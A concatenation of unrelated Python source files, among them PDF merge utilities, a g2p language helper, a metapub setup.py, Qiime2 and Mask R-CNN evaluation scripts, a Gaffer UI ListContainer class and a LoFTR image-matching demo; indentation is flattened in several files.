for page_number in range(pdf_reader.getNumPages()):
page = pdf_reader.getPage(page_number).rotateClockwise(90)
pdf_writer.addPage( page )
output_path = os.path.join('.','output.pdf')
with open(output_path , 'wb') as out_file:
pdf_writer.write(out_file)
def merge_pdfs(paths , output_path):
pdf_writer = PyPDF2.PdfFileWriter()
for path in paths:
if os.path.exists(path):
pdf_reader = PyPDF2.PdfFileReader(path)
# for page_number in range(pdf_reader.getNumPages()):
# page = pdf_reader.getPage(page_number)
# pdf_writer.addPage(page) # Add each page to the writer object
            pdf_writer.appendPagesFromReader(pdf_reader)  # or use this built-in helper instead of adding pages one by one
# Write out the merged PDF
with open(output_path , 'wb') as out_file:
pdf_writer.write(out_file)
def merge_pdfs_v2(pdfs , output):
pdf_merger = PyPDF2.PdfFileMerger()
for pdf in pdfs:
if os.path.exists(pdf):
pdf_merger.append(pdf)
with open(output , 'wb') as out_file:
pdf_merger.write(out_file)
def read_pdf(path):
    # PdfFileReader has no close() method; keep the underlying file open while reading
    with open(path, 'rb') as pdf_file:
        pdf_reader = PyPDF2.PdfFileReader(pdf_file)
        for page in pdf_reader.pages:
            print(page.extractText())  # extract the text of each page
if __name__ == '__main__':
pdf_path = '../Desktop/python-crash-course.pdf'
pdf_paths = []
output_path = os.path.join('.' , 'output.pdf')
# extract_information(pdf_path)
#
# rotate_page(pdf_path)
#
# for root , dirs , files in os.walk('C:/Users/Hussein Sarea/Desktop/Course c++'):
# for file in files:
# pdf_paths.append(os.path.join(root , file))
#
# merge_pdfs(pdf_paths , output_path)
# read_pdf(pdf_path)
for root , dirs , files in os.walk('C:/Users/Hussein Sarea/Desktop/Course c++'):
for file in files:
pdf_paths.append(os.path.join(root , file))
merge_pdfs_v2(pdf_paths , output_path)
|
import click
import g2p.mappings.langs as g2p_langs
from networkx import has_path
def getLangs():
# LANGS_AVAILABLE in g2p lists langs inferred by the directory structure of
# g2p/mappings/langs, but in ReadAlongs, we need all input languages to any mappings.
# E.g., for Michif, we need to allow crg-dv and crg-tmd, but not crg, which is what
# LANGS_AVAILABLE contains. So we define our own list of languages here.
LANGS_AVAILABLE = []
# Set up LANG_NAMES hash table for studio UI to
# properly name the dropdown options
LANG_NAMES = {"eng": "English"}
for k, v in g2p_langs.LANGS.items():
for mapping in v["mappings"]:
# add mapping to names hash table
LANG_NAMES[mapping["in_lang"]] = mapping["language_name"]
# add input id to all available langs list
if mapping["in_lang"] not in LANGS_AVAILABLE:
LANGS_AVAILABLE.append(mapping["in_lang"])
# get the key from all networks in g2p module that have a path to 'eng-arpabet',
# which is needed for the readalongs
# Filter out <lang>-ipa: we only want "normal" input languages.
# Filter out *-norm and crk-no-symbols, these are just intermediate representations.
LANGS = [
x
for x in LANGS_AVAILABLE
if not x.endswith("-ipa")
and not x.endswith("-equiv")
and not x.endswith("-no-symbols")
and g2p_langs.LANGS_NETWORK.has_node(x)
and has_path(g2p_langs.LANGS_NETWORK, x, "eng-arpabet")
]
# Hack to allow old English LexiconG2P
LANGS += ["eng"]
# Sort LANGS so the -h messages list them alphabetically
LANGS = sorted(LANGS)
return LANGS
def parse_g2p_fallback(g2p_fallback_arg):
"""Parse the strings containing a colon-separated list of fallback args into a
Python list of language codes, or empty if None
"""
    if g2p_fallback_arg:
        langs = getLangs()
        g2p_fallbacks = g2p_fallback_arg.split(":")
        for lang in g2p_fallbacks:
            if lang not in langs:
                raise click.BadParameter(
                    f'g2p fallback lang "{lang}" is not valid; choose among {", ".join(langs)}'
                )
        return g2p_fallbacks
else:
return []
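# Hedged usage sketch (the language codes below are assumptions and must be
# present in getLangs() for the call to succeed):
# parse_g2p_fallback("fra:und")  ->  ["fra", "und"]
# parse_g2p_fallback(None)       ->  []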
|
import glob, os
from setuptools import setup, find_packages
setup(
name = 'metapub',
version = '0.4.3.5',
description = 'Pubmed / NCBI / eutils interaction library, handling the metadata of pubmed papers.',
url = 'https://bitbucket.org/metapub/metapub',
author = 'Naomi Most',
maintainer = 'Naomi Most',
author_email = 'naomi@nthmost.com',
maintainer_email = 'naomi@nthmost.com',
license = 'Apache 2.0',
packages = find_packages(),
install_requires = [
'setuptools',
'lxml',
'requests',
'eutils',
'tabulate',
'cssselect',
'unidecode',
'six',
'tox',
],
)
|
#!/usr/bin/env python3
#/home/mat/anaconda3/envs/qiime2-2019.10/bin python3
#/home/mat/anaconda3/envs/qiime2-2019.10/bin Python3
"""
Foundation of a visualization pipeline using Qiime2 artifact API and
Holoviz tools for interactive data comparison
"""
# Built-in/Generic Imports
import os
import sys
import argparse
# Libs
import csv
import re
import unittest
import zipfile
from pathlib import Path
import glob
import fnmatch
# Import Holoviz libraries
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import numpy as np
import hvplot.pandas
import datashader as ds
import dask
import bokeh
import holoviews as hv
import panel as pn
from distutils.version import LooseVersion
from qiime2 import Artifact
from qiime2 import Visualization
from qiime2.plugins import feature_table
import biom
# min_versions = dict(pd='0.24.0', ds='0.7.0', dask='1.2.0', bokeh='1.2.0',
# hv='1.12.3')
__author__ = 'Mathew Richards'
__copyright__ = 'Copyright 2020, AAFC-AAC'
__credits__ = ['Mathew Richards', 'Rodrigo Ortega Polo']
__license__ = 'MIT'
__maintainer__ = 'Mathew Richards'
__email__ = 'mathew.richards@canada.ca'
__status__ = 'Draft'
print("\n", "****Visualization Tools****", "\n")
def setup():
"""Get the directory path from command line arg"""
# argparse section for command line arguments
parser = argparse.ArgumentParser(description='Visualization stuff')
parser.add_argument('directory',
help='The directory path where '
'your qiime2 files are located')
args = parser.parse_args()
try:
dir_name = args.directory
print("The entered directory is:", dir_name, "\n")
except OSError:
print('ERROR: Enter path to data in command line argument')
return dir_name
def main():
dir_name = setup()
print('\n', 'Start of main', '\n')
p = Path('extract_dir')
p.mkdir(exist_ok=True)
demux = dir_name + '/demux.qzv'
print(demux)
data_zip = zipfile.ZipFile(demux, 'r')
data_zip.extractall(path='extract_dir')
# potential to add a RegEx condition to create extract_dir based
# on input files or directory
for file in glob.iglob('extract_dir/*/data/per-*.csv'):
print(file)
data = pd.read_csv(file)
data.head()
fig = px.bar(data, x = 'Sample name', y = 'Sequence count', title = 'test graph')
# HIDE FOR NOW fig.show()
fig1 = go.Figure(go.Scatter(x = data['Sample name'], y = data['Sequence count'],
name ='test graph object'))
fig1.update_layout(title='Demux data', plot_bgcolor='rgb(230,200,170)',
showlegend=True)
# HIDE FOR NOW fig1.show()
print(type(data)) #produces <class 'pandas.core.frame.DataFrame'>
df_widget = pn.widgets.DataFrame(data, name='DataFrame')
df_widget.show()
###PANEL MODULE
def select_row(row=0):
return data.loc[row]
slide = pn.interact(select_row, row=(0, len(data)-1))
# THIS STOPS EXECUTION --> slide.show()
# slide1 = pn.interact(select_row, row=(0, 25))
# slide1.show()
#slide.servable() # FOR USE WITH 'panel serve' command on notebook file .ipynb
# this above call should also work for .py files
tutorial(dir_name)
# data_zip.close()
def tutorial(dir_name):
print('\n', 'Running the Artifact API tutorial section', '\n')
table = dir_name + '/table.qza'
unrarefied_table = Artifact.load(table)
rarefy_result = feature_table.methods.rarefy(table=unrarefied_table, sampling_depth=100)
rarefied_table = rarefy_result.rarefied_table
biom_table = rarefied_table.view(biom.Table)
print(biom_table.head())
if __name__ == '__main__':
main()
"""
ROADMAP
import holoviz and re-create existing graphs from qiime2 analysis
multiple plots at once!!
filters and categories!!
how to automate the import of their data??
output those in the proper bokeh server?
create a conda env with the req. packages for this
python-snappy, fastparquet, pyarrow, bokeh, etc.
add interactivity and other plots in future
transcriptomics, proteomics, metabolomics, etc.
EXTRA - keep for now
# data = data.set_index('Sample name')
# with gzip.open(demux, 'rb'):
# get into random directory beneath the qzv then to data
# for root, dirs, files in os.walk(dir_name):
# isDirectory = os.path.isdir(fpath)
# file = open('*/data/per-sample-fastq-counts.csv'
# file = Visualization.load(demux)
# doesn't seem like many options for this method
# file.hvplot()
# hvplot
"""
|
import requests
from tqdm import tqdm
## full url for downloading.
url = 'https://tenet.dl.sourceforge.net/project/keepass/KeePass%202.x/2.46/KeePass-2.46-Setup.exe'
def download(url, filename):
response = requests.get(url, stream=True)
with tqdm.wrapattr(open(filename, "wb"), "write",
miniters=1, desc=url.split('/')[-1],
total=int(response.headers.get('content-length', 0))) as fout:
for chunk in response.iter_content(chunk_size=4096):
fout.write(chunk)
## please put the full name of the file including the .exe or .zip or .bin
download(url,'KeePass-2.46-Setup.exe')
|
import ref
import cv2
import torch
import numpy as np
from utils.img import Crop, DrawGaussian, Transform3D
c = np.ones(2) * ref.h36mImgSize / 2
s = ref.h36mImgSize * 1.0
img = cv2.imread('../data/h36m/s_01_act_02_subact_01_ca_03/s_01_act_02_subact_01_ca_03_000111.jpg')
img = Crop(img, c, s, 0, ref.inputRes) / 256.
img.shape
img = torch.from_numpy(img).unsqueeze(0).cuda()
out3d = img[:,:,None,:,:].expand(1,3,32,256,256).cuda()
model3d = torch.load('inflatedModel.pth').cuda()
out2d = img.expand(32,3,256,256).cuda()
import pickle
from functools import partial
pickle.Unpickler = partial(pickle.Unpickler, encoding="latin1")
pickle.load = partial(pickle.load, encoding="latin1")
model = torch.load('models/hgreg-3d.pth').cuda()
out2d = model.conv1_(out2d)
out2d = model.bn1(out2d)
out2d = model.relu(out2d)
out2d = model.r1(out2d)
out2d = model.maxpool(out2d)
out2d = model.r4(out2d)
out2d = model.r5(out2d)
out2d = model.hourglass[0](out2d)
out = out2d.t().reshape(1,128,32,64,64)
out1 = model3d.hg.Residual[0](out)
print(out1[0,:,0,:,:])
print("Residual model3d")
out1 = model3d.hg.lin1[0](out1)
print(out1[0,:,0,:,:])
print("lin1 model3d")
out2 = model3d.hg.chantojoints[0](out1)
print(out2[0,:,0,:,:])
print("lin1 model3d")
out1 = model3d.hg.lin2[0](out1)
print(out1[0,:,0,:,:])
print("lin2 model3d")
out = out + out1 + model3d.hg.jointstochan[0](out2)
print(out[0,:,0,:,:])
print("lin1 model3d")
|
import matplotlib.pyplot as plt
import matplotlib.pylab as pylab
import requests
from io import BytesIO
from PIL import Image
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import numpy as np
from coco import COCO
import os
import cv2
import json
def load(url):
"""
    Given a URL of an image, downloads the image and
    returns it as a numpy array in BGR format
"""
response = requests.get(url)
pil_image = Image.open(BytesIO(response.content)).convert("RGB")
# convert to BGR format
image = np.array(pil_image)[:, :, [2, 1, 0]]
return image
def imshow(img):
plt.imshow(img[:, :, [2, 1, 0]])
plt.axis("off")
if __name__ == "__main__":
# this makes our figures bigger
pylab.rcParams['figure.figsize'] = 20, 12
config_file = "../configs/predict.yaml"
iou_threshold = 0.1
# update the config options with the config file
cfg.merge_from_file(config_file)
# manual override some options
cfg.merge_from_list(["MODEL.DEVICE", "cpu"])
coco_demo = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.85,
)
testPath = "../datasets/val"
coco=COCO("../datasets/annotations/val.json")
summaryIoU = [[],[],[],[],[]]
summaryF1 = [[],[],[],[],[]]
summaryP = [[],[],[],[],[]]
summaryR = [[],[],[],[],[]]
allBG_F1 = [[],[],[],[],[]]
pixel_acc_list = [[],[],[],[],[]]
pixel_recall_list = [[],[],[],[],[]]
pixel_precision_list = [[],[],[],[],[]]
pixel_IOU_list = [[],[],[],[],[]]
bbox_iou_list = []
bbox_threshold = 0.5
# Loop all testing images
for image_name in os.listdir(testPath):
print(image_name)
#print(img)
#image_name = "grid1_roi2_500kx_0p5nm_haadf1_0039.jpg"
image = cv2.imread(testPath +"/" +image_name)
#imshow(image)
# prepare gt mask
catIds = coco.getCatIds()
imgIds = coco.getImgIds(catIds=catIds );
gt_labels = list()
bboxes = []
with open('../datasets/annotations/val.json') as json_data:
annotation = json.loads(json_data.read())
images = annotation['images']
for i in range(len(images)):
if(images[i]["file_name"] == image_name):
imgId = images[i]["id"]
seg = annotation['annotations']
for i in range(len(seg)):
if seg[i]['image_id'] == imgId:
gt_labels.append(seg[i]['category_id'])
bboxes.append(seg[i]['bbox'])
img = coco.loadImgs(imgId)[0]
annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)
anns = coco.loadAnns(annIds)
#plt.imshow(image)
#coco.showAnns(anns)
gt_allMask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type1Mask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type2Mask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type3Mask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type4Mask = np.zeros(coco.annToMask(anns[0]).shape)
# get the mask for each class
for i in range(len(anns)):
if gt_labels[i] == 1:
gt_type1Mask += coco.annToMask(anns[i])
gt_type1Mask[gt_type1Mask >= 2] = 1
if gt_labels[i] == 2:
gt_type2Mask += coco.annToMask(anns[i])
gt_type2Mask[gt_type2Mask >= 2] = 1
if gt_labels[i] == 3:
gt_type3Mask += coco.annToMask(anns[i])
gt_type3Mask[gt_type3Mask >= 2] = 1
if gt_labels[i] == 4:
gt_type4Mask += coco.annToMask(anns[i])
gt_type4Mask[gt_type4Mask >= 2] = 1
gt_allMask += coco.annToMask(anns[i])
gt_mask_list = [[],[],[],[]]
for i in range(len(anns)):
if gt_labels[i] == 1:
gt_mask_list[0].append(coco.annToMask(anns[i]))
if gt_labels[i] == 2:
gt_mask_list[1].append(coco.annToMask(anns[i]))
if gt_labels[i] == 3:
gt_mask_list[2].append(coco.annToMask(anns[i]))
if gt_labels[i] == 4:
gt_mask_list[3].append(coco.annToMask(anns[i]))
#plt.imshow(gt_allMask)
# begin predication
# compute predictions
predictions = coco_demo.run_on_opencv_image(image)
cv2.imwrite(image_name, predictions)
mask, labels = coco_demo.get_predicted_mask_labels(image) # mask is predicted mask
#print(mask[0])
print(len(labels))
print(len(mask))
print(len(anns))
        # TODO: new_labels holds the predicted labels, kept separate from the gt labels above
new_labels = np.zeros(len(labels))
for i in range(len(labels)):
new_labels[i] = labels[i].item()
#print(new_labels)
pred_mask = np.zeros((1024,1024,4))
# generate predict mask
allgtBG = np.zeros((1024,1024,4))
allpredBG = np.zeros((1024,1024,4))
for i in range(len(new_labels)):
maxIoU = 0
maxLabel = 0
currentPredMask = mask[i][0]
allpredBG[:,:,int(new_labels[i])-1] = allpredBG[:,:,int(new_labels[i])-1] + currentPredMask
for j in range(len(gt_mask_list)):
for gtMask in gt_mask_list[j]:
allgtBG[:,:,int(new_labels[i])-1] = allgtBG[:,:,int(new_labels[i])-1] + gtMask
# addAllBG = allgtBG + allpredBG
# BGIntersection = 1024*1024 - np.count_nonzero(addAllBG)
# UnionHelperMat = np.zeros((1024,1024))
# UnionHelperMat[np.where(allgtBG == 0)] = 1
# UnionHelperMat[np.where(allpredBG == 0)] = 1
# BGUnion = np.count_nonzero(UnionHelperMat)
for i in range(len(new_labels)):
if new_labels[i] == 1:
pred_mask[:,:,0] += mask[i][0]
if new_labels[i] == 2:
pred_mask[:,:,1] += mask[i][0]
if new_labels[i] == 3:
pred_mask[:,:,2] += mask[i][0]
if new_labels[i] == 4:
pred_mask[:,:,3] += mask[i][0]
#plt.imshow(pred_mask[:,:,0])
        type1_pred = []
        type2_pred = []
        type3_pred = []
        type4_pred = []
        allTypes_pred = []
class_ids = [1,2,3,4]
mask1 = np.zeros((1024,1024)) # 111 prediction for this image
mask2 = np.zeros((1024,1024))
mask3 = np.zeros((1024,1024))
mask4 = np.zeros((1024,1024))
allmask = np.zeros((1024,1024))
mask = pred_mask
#print(class_ids)
for j in range(len(class_ids)):
this_channel = mask[:,:,j]
class_id = class_ids[j]
# print(np.count_nonzero(this_channel))
if class_id == 1:
mask1 = mask1 + this_channel
mask1[mask1 >= 2] = 1
elif class_id == 2:
mask2 = mask2 + this_channel
mask2[mask2 >= 2] = 1
elif class_id == 3:
mask3 = mask3 + this_channel
mask3[mask3 >= 2] = 1
else:
mask4 = mask4 + this_channel
mask4[mask4 >= 2] = 1
allmask = allmask + this_channel
allmask[allmask >= 2] = 1
# 111 loop
TP = np.zeros(5)
TN = np.zeros(5)
masks_list = [mask1,mask2,mask3,mask4,allmask]
gt_mask_list = [gt_type1Mask,gt_type2Mask,gt_type3Mask,gt_type4Mask,gt_allMask]
for i in range(5):
TP[i] = np.count_nonzero((masks_list[i] + gt_mask_list[i]) >= 2)
TN[i] = 1024*1024 - np.count_nonzero(masks_list[i] + gt_mask_list[i])
pixel_acc = (TP[i] + TN[i])/(1024*1024)
if TP[i] == 0:
pixel_recall = 0
pixel_prec = 0
pixel_IOU = 0
else:
pixel_recall = TP[i]/np.count_nonzero(gt_mask_list[i])
pixel_prec = TP[i]/np.count_nonzero(masks_list[i])
pixel_IOU = TP[i]/(1024*1024-TN[i])
            # note: NaN must be detected with np.isnan(); comparing against float('nan') is always False
            if np.isnan(pixel_recall):
                pixel_recall = 0
            if pixel_recall == 0 or np.isnan(pixel_recall):
                pixel_prec = 0
pixel_acc_list[i].append(pixel_acc)
pixel_recall_list[i].append(pixel_recall)
pixel_precision_list[i].append(pixel_prec)
pixel_IOU_list[i].append(pixel_IOU)
print("Recall: Type " + str(i) + ":" + str(pixel_recall))
print("Precision: Type " + str(i) + ":" + str(pixel_prec))
print("IoU: Type " + str(i) + ":" + str(pixel_IOU))
print("Type " + str(i) + ":" + str(pixel_acc))
############################################################################################################
# pred_bboxes, pred_labels = coco_demo.get_bbox(image)
# # print("length of predicted boxes:", pred_bboxes.shape)
# # print("length of gt boxes:", len(bboxes))
# # print("length of labels:", len(labels))
# gt_bbox_map = np.zeros((1024,1024,len(bboxes))) # each channel is one gt defect, pixel level => IoU
# pred_bbox_map = np.zeros((1024,1024,len(pred_bboxes)))
# for i in range(len(bboxes)):
# start_i = int(bboxes[i][0])
# end_i = int(bboxes[i][2]+bboxes[i][0])
# start_j = int(bboxes[i][1])
# end_j = int(bboxes[i][1]+bboxes[i][3])
# gt_bbox_map[start_i:end_i,start_j:end_j,i] = 1
# for i in range(len(pred_bboxes)):
# start_i = int(pred_bboxes[i][0])
# end_i = int(pred_bboxes[i][1])#int(pred_bboxes[i][2]+pred_bboxes[i][0])
# start_j = int(pred_bboxes[i][2])#int(pred_bboxes[i][1])
# end_j = int(pred_bboxes[i][3])#int(pred_bboxes[i][1]+pred_bboxes[i][3])
# pred_bbox_map[start_i:start_j,end_i:end_j,i] = 1
# index_list = [] # store which pred correspond to which gt
# iou_list = []
# label_list = []
# for i in range(len(pred_bboxes)):
# max_threshold = 0
# max_label = 0
# max_index = -1
# for j in range(len(bboxes)):
# bbox_interaction = np.count_nonzero((pred_bbox_map[:,:,i]+gt_bbox_map[:,:,j]) >= 2)
# bbox_union = np.count_nonzero(pred_bbox_map[:,:,i]+gt_bbox_map[:,:,j])
# bbox_iou = bbox_interaction/bbox_union
# if bbox_iou > max_threshold:
# max_threshold = bbox_iou
# max_index = j
# max_label = gt_labels[j]
# index_list.append(max_index)
# iou_list.append(max_threshold)
# label_list.append(max_label)
# for i in range(len(pred_bboxes)):
# if index_list[i] == -1:
# continue
# if iou_list[i] > iou_threshold:
# if label_list[i] == pred_labels[i]:
# bbox_iou_list.append(iou_list[i])
# print(index_list)
###################################################################################################
for i in range(5):
print(sum(pixel_acc_list[i]) / len(os.listdir(testPath)))
print(sum(pixel_recall_list[i]) / len(os.listdir(testPath)))
print(sum(pixel_precision_list[i]) / len(os.listdir(testPath)))
print(sum(pixel_IOU_list[i]) / len(os.listdir(testPath)))
# print(sum(bbox_iou_list)/len(bbox_iou_list))
print("===============================================")
|
import gettext
import provision.maas
from guacamole import Command
_ = gettext.gettext
class Launcher(Command):
name = 'launcher'
def __init__(self):
self.launcher = None
self.provision = None
super().__init__()
def register_arguments(self, parser):
parser.add_argument(
'launcher', nargs='?',
help=_("Launcher definition file to use"))
def invoked(self, ctx):
self.launcher = ctx.cmd_toplevel.launcher
config_yaml = self.launcher.config_yaml['maas']
self.provision = provision.maas.MaaS(config_yaml)
self.provision.create_pool()
if 'pods' in config_yaml:
self.provision.create_nodes()
else:
self.provision.create_node()
print("The launcher is created by {}".format(ctx.args.launcher))
print("The config content is \n{}".format(self.launcher.config_yaml))
print("Creating the pod...")
self.provision.create_pod()
print("Updating the interface of the nodes of the pod...")
self.provision.update_interface()
print("Deploying the nodes")
self.provision.deploy_nodes()
print("All known nodes specified distro are deployed.")
|
##########################################################################
#
# Copyright (c) 2011, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import GafferUI
QtGui = GafferUI._qtImport( "QtGui" )
QtCore = GafferUI._qtImport( "QtCore" )
## The ListContainer holds a series of Widgets either in a column or a row.
# It attempts to provide a list like interface for manipulation of the widgets.
class ListContainer( GafferUI.ContainerWidget ) :
Orientation = IECore.Enum.create( "Vertical", "Horizontal" )
HorizontalAlignment = GafferUI.Enums.HorizontalAlignment
VerticalAlignment = GafferUI.Enums.VerticalAlignment
def __init__( self, orientation=Orientation.Vertical, spacing=0, borderWidth=0, **kw ) :
GafferUI.ContainerWidget.__init__( self, QtGui.QWidget(), **kw )
if orientation==self.Orientation.Vertical :
self.__qtLayout = QtGui.QVBoxLayout()
else :
self.__qtLayout = QtGui.QHBoxLayout()
self.__qtLayout.setSpacing( spacing )
self.__qtLayout.setContentsMargins( borderWidth, borderWidth, borderWidth, borderWidth )
self.__qtLayout.setSizeConstraint( QtGui.QLayout.SetMinAndMaxSize )
self._qtWidget().setLayout( self.__qtLayout )
self.__orientation = orientation
self.__widgets = []
def orientation( self ) :
return self.__orientation
def append( self, child, expand=False, horizontalAlignment=None, verticalAlignment=None ) :
assert( isinstance( child, GafferUI.Widget ) )
oldParent = child.parent()
if oldParent is not None :
oldParent.removeChild( child )
self.__widgets.append( child )
stretch = 1 if expand else 0
self.__qtLayout.addWidget( child._qtWidget(), stretch, self.__convertToQtAlignment( horizontalAlignment, verticalAlignment ) )
child._applyVisibility()
def remove( self, child ) :
self.removeChild( child )
def insert( self, index, child, expand=False, horizontalAlignment=None, verticalAlignment=None ) :
l = len( self.__widgets )
if index > l :
index = l
oldParent = child.parent()
if oldParent is not None :
oldParent.removeChild( child )
self.__widgets.insert( index, child )
stretch = 1 if expand else 0
self.__qtLayout.insertWidget( index, child._qtWidget(), stretch, self.__convertToQtAlignment( horizontalAlignment, verticalAlignment ) )
child._applyVisibility()
def index( self, child ) :
return self.__widgets.index( child )
def __setitem__( self, index, child ) :
# Shortcut if there would be no change. Rearranging
# things in Qt is extremely costly and this test is
# trivial in comparison, so this is well worth doing.
if self.__widgets[index] == child :
return
if isinstance( index, slice ) :
assert( isinstance( child, list ) )
children = child
insertionIndex = index.start if index.start is not None else 0
else :
children = [ child ]
insertionIndex = index
expands = []
for i in range( insertionIndex, insertionIndex + len( children ) ) :
if i < len( self ) :
expands.append( self.__qtLayout.stretch( i ) > 0 )
else :
expands.append( False )
del self[index]
# It's very important that we insert widgets in the order in which
# they are to appear visually, because qt will define the tab-focus
# chain order based on order of insertion, and not based on the order
# of visual appearance. It's still possible to make several calls to
# __setitem__ out of sequence and end up with bad focus orders, but
# at least this way a slice set at one time will be in the correct order.
#
# Investigation into a method of achieving perfect ordering all the
# time didn't yield anything better than this. One attempt called
# setTabOrder() for every child, starting with the last child - this
# worked when the children of the ListContainer where childless,
# but not when they had children. Another possibility was to reimplement
# QWidget.focusNextPrevChild() at the GafferUI.Window level, iterating
# through the focus chain as for QApplicationPrivate::focusNextPrevChild_helper(),
# but using knowledge of Container order to override the sequence where
# necessary. This seemed like it might have promise, but is not straightforward.
for i in range( 0, len( children ) ) :
self.insert( insertionIndex + i, children[i], expands[i] )
def __getitem__( self, index ) :
return self.__widgets[index]
def __delitem__( self, index ) :
if isinstance( index, slice ) :
indices = range( *(index.indices( len( self ) )) )
for i in indices :
self[i]._qtWidget().setParent( None )
self[i]._applyVisibility()
del self.__widgets[index]
else :
self.__widgets[index]._qtWidget().setParent( None )
self.__widgets[index]._applyVisibility()
del self.__widgets[index]
def __len__( self ) :
return len( self.__widgets )
def __convertToQtAlignment( self, horizontalAlignment, verticalAlignment):
if not horizontalAlignment and not verticalAlignment:
return QtCore.Qt.Alignment( 0 )
if verticalAlignment:
qtVerticalAlignment = GafferUI.VerticalAlignment._toQt( verticalAlignment )
else:
qtVerticalAlignment = QtCore.Qt.Alignment( 0 )
if horizontalAlignment:
qtHorizontalAlignment = GafferUI.HorizontalAlignment._toQt( horizontalAlignment )
else:
qtHorizontalAlignment = QtCore.Qt.Alignment( 0 )
return qtHorizontalAlignment | qtVerticalAlignment
def addSpacer( self, width=0, height=0, expand=False, horizontalAlignment=None, verticalAlignment=None):
self.append( GafferUI.Spacer( IECore.V2i( width, height ) ), expand=expand, horizontalAlignment=horizontalAlignment, verticalAlignment=verticalAlignment )
def addChild( self, child, expand=False, horizontalAlignment=None, verticalAlignment=None ) :
self.append( child, expand=expand, horizontalAlignment=horizontalAlignment, verticalAlignment=verticalAlignment )
def removeChild( self, child ) :
self.__widgets.remove( child )
child._qtWidget().setParent( None )
child._applyVisibility()
def setExpand( self, child, expand ) :
self.__qtLayout.setStretchFactor( child._qtWidget(), 1 if expand else 0 )
def getExpand( self, child ) :
stretch = self.__qtLayout.stretch( self.index( child ) )
return stretch > 0
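# Minimal usage sketch (illustrative; the child widgets are assumptions) :
# column = ListContainer( ListContainer.Orientation.Vertical, spacing = 4 )
# column.append( someWidget )                       # fixed-size child
# column.append( anotherWidget, expand = True )     # stretches to fill extra space
# column.addSpacer( height = 8 )                    # fixed gap between children
# print( column.index( someWidget ), len( column ) )
# del column[-1]                                    # children support list-style removal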
|
import os
import torch
import cv2
import numpy as np
import matplotlib.cm as cm
from src.utils.plotting import make_matching_figure
from src.loftr import LoFTR, default_cfg
# The default config uses dual-softmax.
# The outdoor and indoor models share the same config.
# You can change the default values like thr and coarse_match_type.
matcher = LoFTR(config=default_cfg)
matcher.load_state_dict(torch.load("weights/indoor_ds.ckpt")['state_dict'])
matcher = matcher.eval().cuda()
# Load example images
img0_pth = "assets/scannet_sample_images/scene0711_00_frame-001680.jpg"
img1_pth = "assets/scannet_sample_images/scene0711_00_frame-001995.jpg"
img0_raw = cv2.imread(img0_pth, cv2.IMREAD_GRAYSCALE)
img1_raw = cv2.imread(img1_pth, cv2.IMREAD_GRAYSCALE)
img0_raw = cv2.resize(img0_raw, (640, 480))
img1_raw = cv2.resize(img1_raw, (640, 480))
import datetime
starttime = datetime.datetime.now()
img0 = torch.from_numpy(img0_raw)[None][None].cuda() / 255.
img1 = torch.from_numpy(img1_raw)[None][None].cuda() / 255.
batch = {'image0': img0, 'image1': img1}
# Inference with LoFTR and get prediction
with torch.no_grad():
matcher(batch)
mkpts0 = batch['mkpts0_f'].cpu().numpy()
mkpts1 = batch['mkpts1_f'].cpu().numpy()
mconf = batch['mconf'].cpu().numpy()
endtime = datetime.datetime.now()
print((endtime - starttime).total_seconds() * 1e6)  # elapsed time in microseconds (total, not just the .microseconds component)
color = cm.jet(mconf)
text = [
'LoFTR',
'Matches: {}'.format(len(mkpts0)),
]
fig = make_matching_figure(img0_raw, img1_raw, mkpts0, mkpts1, color, text=text)
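# The figure is only created above and never displayed or saved; a minimal
# follow-up (the output path is an assumption):
# fig.savefig("loftr_matches.png", bbox_inches='tight', dpi=150)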
|
from django.shortcuts import render
def index(request):
return render(request, 'pages/index.html')
def yandex(request):
return render(request, 'pages/yandex_c44e9dee4b34e712.html')
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <lead2gold@gmail.com>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
